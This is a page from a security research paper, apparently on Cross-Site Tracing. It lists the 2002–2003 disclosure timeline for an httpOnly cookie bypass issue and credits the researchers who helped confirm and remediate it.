  • 14. Issue Discovery & Disclosure Time line November 1, 2002. httpOnly bypass issue identified. November 28, 2002. Increased Exposure identified. December 4, 2002. Issue disclosed and confirmed by Tim Mullen December 4, 2002. Issue disclosed and confirmed by Ryan Russell December 5, 2002. Issue disclosed and confirmed by Steve Christey (Mitre) December 6, 2002. Issue disclosed and confirmed by Rain Forest Puppy (Wiretrip.net) December 10, 2002. Issue disclosed and confirmed by CERT. January 20, 2003. Issue publicly disclosed by WhiteHat. Credits & anks Robert Auger: For help with security research, vulnerability identification, and mirror help. Rain Forest Puppy: For help with vulnerability confirmation, security resolutions research and the XST title. Tim Mullen: For help with vulnerability confirmation and security resolutions Steve Christey: For help with vulnerability confirmation and feedback Ryan Russell: For help with vulnerability confirmation Robert Rodger: For help with iPlanet vulnerability confirmation and remediation Alastair Davie: For help with iPlanet vulnerability confirmation and remediation